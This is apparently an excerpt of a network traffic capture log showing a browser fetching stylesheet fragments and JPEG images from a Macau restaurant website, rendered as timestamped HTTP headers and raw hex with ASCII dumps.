                                                                                                                                                              Data Ascii: e { width: 100%; background: #f7f7f7; } .new-products-box { width: 100%; padding: 0.42rem 20px 0.315rem; box-sizing: border-box; } .new-products-box h2 { font-size: 28px; line-height: 24px; color: #666; text-
                                                                                                                                                              Mar 13, 2023 05:26:06.249212980 CET654INData Raw: 2c 30 2c 30 2c 30 29 3b 0d 0a 20 7d 0d 0a 20 2f 2a e5 8f b3 e4 be a7 2a 2f 0d 0a 20 2e 70 72 6f 64 75 63 74 2d 72 69 67 68 74 20 7b 0d 0a 20 09 77 69 64 74 68 3a 20 34 39 2e 37 25 3b 0d 0a 20 7d 0d 0a 20 2e 70 72 6f 64 75 63 74 2d 72 69 67 68 74
                                                                                                                                                              Data Ascii: ,0,0,0); } /**/ .product-right { width: 49.7%; } .product-right a { background: #fff; box-shadow: 0px 1px 3px 0px rgba(28,41,47,0.08); } .product-right-top { margin-bottom: 10px; } .product-right a { text
                                                                                                                                                              Mar 13, 2023 05:26:06.452080011 CET681INData Raw: 20 30 70 78 20 31 70 78 20 33 70 78 20 30 70 78 20 72 67 62 61 28 32 38 2c 34 31 2c 34 37 2c 30 2e 30 38 29 3b 0d 0a 7d 0d 0a 20 0d 0a 2e 6e 65 77 2d 70 72 6f 64 75 63 74 73 20 2e 70 72 6f 64 75 63 74 2d 6c 65 66 74 3a 68 6f 76 65 72 2c 0d 0a 2e
                                                                                                                                                              Data Ascii: 0px 1px 3px 0px rgba(28,41,47,0.08);} .new-products .product-left:hover,.new-products .product-right-bottom:hover,.new-products .product-right-top:hover { transition: all .2s linear; -webkit-transition: all .2s linear; -
                                                                                                                                                              Mar 13, 2023 05:26:06.452147007 CET683INData Raw: 63 6b 3b 0d 0a 7d 0d 0a 2e 73 6f 6c 75 74 69 6f 6e 73 2d 77 61 70 20 7b 0d 0a 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 2e 73 6f 6c 75 74 69 6f 6e 73 2d 6c 69 73 74 20 7b 0d 0a 09 0d 0a 7d 0d 0a 2e 73 6f 6c 75 74 69 6f 6e 73 2d
                                                                                                                                                              Data Ascii: ck;}.solutions-wap {display: none;}.solutions-list {}.solutions-list li {position: relative;float: left;width: 33.1%;height: 1.76rem;text-align: center;margin-bottom: .035rem;background-position: center;
                                                                                                                                                              Mar 13, 2023 05:26:06.452195883 CET684INData Raw: 20 75 72 6c 28 2e 2e 2f 69 6d 67 2f 73 69 62 66 2e 6a 70 67 29 3b 0d 0a 7d 0d 0a 2e 73 6f 6c 75 74 69 6f 6e 73 2d 6c 69 73 74 2d 65 6e 20 6c 69 3a 6e 74 68 2d 63 68 69 6c 64 28 36 29 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65
                                                                                                                                                              Data Ascii: url(../img/sibf.jpg);}.solutions-list-en li:nth-child(6) {background-image: url(../img/stock-photo.jpg);}.list-no-hover {margin-top: .685rem;}.list-no-hover h3 {font-size: 24px;line-height: 24px;color: #fff;margi
                                                                                                                                                              Mar 13, 2023 05:26:06.532285929 CET704INData Raw: 66 66 66 3b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d e6 9f 94 e6 80 a7 2b e6 8a 80 e6 9c af 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                                                                                              Data Ascii: fff;font-size: 12px!important;}/*----------------+-----------------*/ .flex-box{ padding: 0.42rem 20px; width:100%; color:#fff; box-sizing: border-box; } .flex-box h2{ font-size:28px; l
                                                                                                                                                              Mar 13, 2023 05:26:06.532335997 CET705INData Raw: 65 3b 0d 0a 20 20 6c 65 66 74 3a 34 2e 38 72 65 6d 3b 0d 0a 20 20 74 6f 70 3a 31 2e 33 72 65 6d 3b 0d 0a 20 20 7a 2d 69 6e 64 65 78 3a 39 3b 0d 0a 20 20 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0d 0a 7d 0d 0a 2e 76 69 64 65 6f 2d 6d 6f 64 61
                                                                                                                                                              Data Ascii: e; left:4.8rem; top:1.3rem; z-index:9; cursor:pointer;}.video-modal-mask{ position:fixed; top:0; left:0; width:100%; height:100%; background:rgba(0, 0, 0, .5); z-index:999999; display: none; transitio
                                                                                                                                                              Mar 13, 2023 05:26:08.473752975 CET1039OUTGET /images/topbanner.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:08.695534945 CET1121INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 30262
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:27 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "8228d3f9a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:14 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 10 a7 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 03 ca 00 00 01 01 00 03 00 00 00 01 00 81 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 33 30 20 31 33 3a 32 33 3a 34 34 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 03 ca a0 03 00 04 00 00 00 01 00 00 00 81 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 0f 21 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f
                                                                                                                                                              Data Ascii: ExifMM*(12i ''Adobe Photoshop CS6 (Windows)2020:06:30 13:23:440221nv(~!HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http:/
                                                                                                                                                              Mar 13, 2023 05:26:08.695588112 CET1122INData Raw: 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii: /www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Refer
                                                                                                                                                              Mar 13, 2023 05:26:09.141464949 CET1237OUTGET /images/indexpic04.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:09.350367069 CET1284INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 86879
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "1c7cbff7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:14 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 1f 8a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 00 a0 00 00 01 01 00 03 00 00 00 01 01 5e 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 35 3a 32 38 20 31 31 3a 33 34 3a 32 33 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 00 a0 a0 03 00 04 00 00 00 01 00 00 01 5e 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 1e 04 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f
                                                                                                                                                              Data Ascii: ExifMM*^(12i ''Adobe Photoshop CS6 (Windows)2020:05:28 11:34:230221^nv(~HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http:/
                                                                                                                                                              Mar 13, 2023 05:26:12.377567053 CET1847OUTGET /images/menu02.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:12.582542896 CET1909INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1252
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "d2771cf8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:17 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 3e 03 01 11 00 02 11 01 03 11 01 ff c4 00 88 00 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 04 05 03 06 07 01 02 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 08 10 00 02 02 01 04 02 02 00 05 05 01 00 00 00 00 00 01 02 03 04 05 00 11 12 06 21 22 31 14 41 51 32 13 07 61 81 42 53 16 17 11 00 01 03 02 03 06 04 07 01 00 00 00 00 00 00 00 01 00 11 02 31 03 21 41 12 51 61 71 b1 22 04 81 91 d1 13 f0 a1 c1 32 52 82 14 23 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ef bc f5 f2 ca f0 14 8f af 68 d5 37 85 69 7e 92 ca 20 37 38 37 ed 09 4a 96 11 f3 db 8f 22 a0 9d b7 df 6d 1b 07 56 d2 59 f2 51 f9 e8 aa 9c f4 44 e7 a2 27 3d 11 39 e8 89 cf 44 5d db f8 e6 9a 62 f0 14 64 b6 d4 12 b7 7b bd 2d 1c bf dc b9 52 ac 83 12 91 bd 62 f1 25 99 63 67 de 79 4b 7a 02 77 8c 7f 4d 76 5a 8b 0e 3c 97 a9 da 47 4c 03 b7 51 62 e4 0e 9a 67 bf 92 a4 5a 18 dc 17 47 ec 18 be d1 5e f5 86 c5 f6 f4 ab f5 e8 cb 1d 77 69 a3 ad 2a 12 64 96 39 80 5e 20 b0 d9 0e fe 07 80 77 d5 74 88 c0 83 b5 67 a2 30 b5 28 cd f0 96 5c 3c 54 6c d7 49 c0 f5 8f fa 4b f9 39 ef e4 f1 b8 dc 85 3a 18 9a 75 64 8e b4 f2 1b b5 7e e2 b4 f3 3c 53 2a 70 8b 60 40 43 c9 bf 21 a8 95 a1 17 25 45 ce da 16 f5 12 e4 02 00 ca a1 f1 aa c7 9e e8 b8 9c 5e 27 b2 e5 aa 5c b7 34 54 ab e0 ae e1 52 62 8a e2 0c ba 4a ec 96 54 27 97 4e 00 0e 24 7e 7b 7e 01 2b 40 02 78 7c d4 5d ed a3 18 ca 40 9c 34 91 fb 6d 57 f5 7a df 54 c2 0e d7 5a e6 3a de 58 47 d4 29 65 92 57 9e 04 78 de cb 56 69 04 25 aa c9 c1 b9 49 b2 bf 9d 97 75 20 ef b8 b0 b7 18 bf 05 ac 6c db 86 a0 41 3d 20 e5 9b 6e 5a 77 f1 a9 59 3b 2d f5 81 58 2c 98 5c c0 86 36 21 9b 63 4a 6e 20 90 17 73 fd 86 a9 64 75 78 15 cf da 7d e7 81 e4 56 5e b2 22 6f e3 ee fa 2c 48 60 af 2e 43 03 1b d8 e2 5b 88 fd cb 25 88 03 e4 a8 f3 b6 90 1d 12 f0 53 64 7f 8c df 6c 7e aa 6d de a5 d7 6b e6 f0 b1 05 b1 0f 54 bf 3d 88 df b5 36 5a a4 d5 e6 8a 34 e4 1d 19 2a 81 0c 88 3d 8c 2f c9 db c2 0d 89 0d a9 36 e2 e3 66 d7 56 95 88 09 0f c4 e6 e3 d3 0e 15 c9 73 2c 86 67 23 95 4c 7c 77 ec fe fc 78 aa a9 4b 1f 18 44 41 1c 08 59 82 80 8a bb f9 62 49 3e 4f e2 75 99 24 d5 72 ca 66 4c f9 06 5b 2f fe 8f db cb de 69 72 50 d8 19 29 a2 b3 7e 2b 14 a9 cd 1c b3 43 1a c7 1c 8f 1c 90 b2 96 55 41 e7 6f 9f 6f d5 e7 57 f7 64 b6 fe ab 98 e3 5d c3 d1 42 87 bb f6 58 67 cb 58 6c 88 b8 d9 d9 16 6c bc 57 a0 82 e4 33 c8 87 74 67 86 c4 72 47 ba ff 00 89 0b e3 e0 6a 3d c9 63 bd 50 77 13 04 97 ad 5d 8f 35 ec 5d e3 b3 45 77 27 90 39 25 b3 63 30 a8 99 35 b7 5e 0b 50 cc b1 10 63 0d 04 f1 bc 7b 26 c3 8e cb eb f8 6d a7 b9 27 75 23 b8 98 24 bd 6b
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed>!"1AQ2aBS1!AQaq"2R#?h7i~ 787J"mVYQD'=9D]bd{-Rb%cgyKzwMvZ<GLQbgZG^wi*d9^ wtg0(\<TlIK9:ud~<S*p`@C!%E^'\4TRbJT'N$~{~+@x|]@4mWzTZ:XG)eWxVi%Iu lA= nZwY;-X,\6!cJn sdux}V^"o,H`.C[%Sdl~mkT=6Z4*=/6fVs,g#L|wxKDAYbI>Ou$rfL[/irP)~+CUAooWd]BXgXllW3tgrGj=cPw]5]Ew'9%c05^Pc{&m'u#$k
                                                                                                                                                              Mar 13, 2023 05:26:12.771437883 CET1941OUTGET /images/menu01b.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:12.779036999 CET1945INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1252
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "d2771cf8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:17 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 3e 03 01 11 00 02 11 01 03 11 01 ff c4 00 88 00 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 04 05 03 06 07 01 02 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 08 10 00 02 02 01 04 02 02 00 05 05 01 00 00 00 00 00 01 02 03 04 05 00 11 12 06 21 22 31 14 41 51 32 13 07 61 81 42 53 16 17 11 00 01 03 02 03 06 04 07 01 00 00 00 00 00 00 00 01 00 11 02 31 03 21 41 12 51 61 71 b1 22 04 81 91 d1 13 f0 a1 c1 32 52 82 14 23 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ef bc f5 f2 ca f0 14 8f af 68 d5 37 85 69 7e 92 ca 20 37 38 37 ed 09 4a 96 11 f3 db 8f 22 a0 9d b7 df 6d 1b 07 56 d2 59 f2 51 f9 e8 aa 9c f4 44 e7 a2 27 3d 11 39 e8 89 cf 44 5d db f8 e6 9a 62 f0 14 64 b6 d4 12 b7 7b bd 2d 1c bf dc b9 52 ac 83 12 91 bd 62 f1 25 99 63 67 de 79 4b 7a 02 77 8c 7f 4d 76 5a 8b 0e 3c 97 a9 da 47 4c 03 b7 51 62 e4 0e 9a 67 bf 92 a4 5a 18 dc 17 47 ec 18 be d1 5e f5 86 c5 f6 f4 ab f5 e8 cb 1d 77 69 a3 ad 2a 12 64 96 39 80 5e 20 b0 d9 0e fe 07 80 77 d5 74 88 c0 83 b5 67 a2 30 b5 28 cd f0 96 5c 3c 54 6c d7 49 c0 f5 8f fa 4b f9 39 ef e4 f1 b8 dc 85 3a 18 9a 75 64 8e b4 f2 1b b5 7e e2 b4 f3 3c 53 2a 70 8b 60 40 43 c9 bf 21 a8 95 a1 17 25 45 ce da 16 f5 12 e4 02 00 ca a1 f1 aa c7 9e e8 b8 9c 5e 27 b2 e5 aa 5c b7 34 54 ab e0 ae e1 52 62 8a e2 0c ba 4a ec 96 54 27 97 4e 00 0e 24 7e 7b 7e 01 2b 40 02 78 7c d4 5d ed a3 18 ca 40 9c 34 91 fb 6d 57 f5 7a df 54 c2 0e d7 5a e6 3a de 58 47 d4 29 65 92 57 9e 04 78 de cb 56 69 04 25 aa c9 c1 b9 49 b2 bf 9d 97 75 20 ef b8 b0 b7 18 bf 05 ac 6c db 86 a0 41 3d 20 e5 9b 6e 5a 77 f1 a9 59 3b 2d f5 81 58 2c 98 5c c0 86 36 21 9b 63 4a 6e 20 90 17 73 fd 86 a9 64 75 78 15 cf da 7d e7 81 e4 56 5e b2 22 6f e3 ee fa 2c 48 60 af 2e 43 03 1b d8 e2 5b 88 fd cb 25 88 03 e4 a8 f3 b6 90 1d 12 f0 53 64 7f 8c df 6c 7e aa 6d de a5 d7 6b e6 f0 b1 05 b1 0f 54 bf 3d 88 df b5 36 5a a4 d5 e6 8a 34 e4 1d 19 2a 81 0c 88 3d 8c 2f c9 db c2 0d 89 0d a9 36 e2 e3 66 d7 56 95 88 09 0f c4 e6 e3 d3 0e 15 c9 73 2c 86 67 23 95 4c 7c 77 ec fe fc 78 aa a9 4b 1f 18 44 41 1c 08 59 82 80 8a bb f9 62 49 3e 4f e2 75 99 24 d5 72 ca 66 4c f9 06 5b 2f fe 8f db cb de 69 72 50 d8 19 29 a2 b3 7e 2b 14 a9 cd 1c b3 43 1a c7 1c 8f 1c 90 b2 96 55 41 e7 6f 9f 6f d5 e7 57 f7 64 b6 fe ab 98 e3 5d 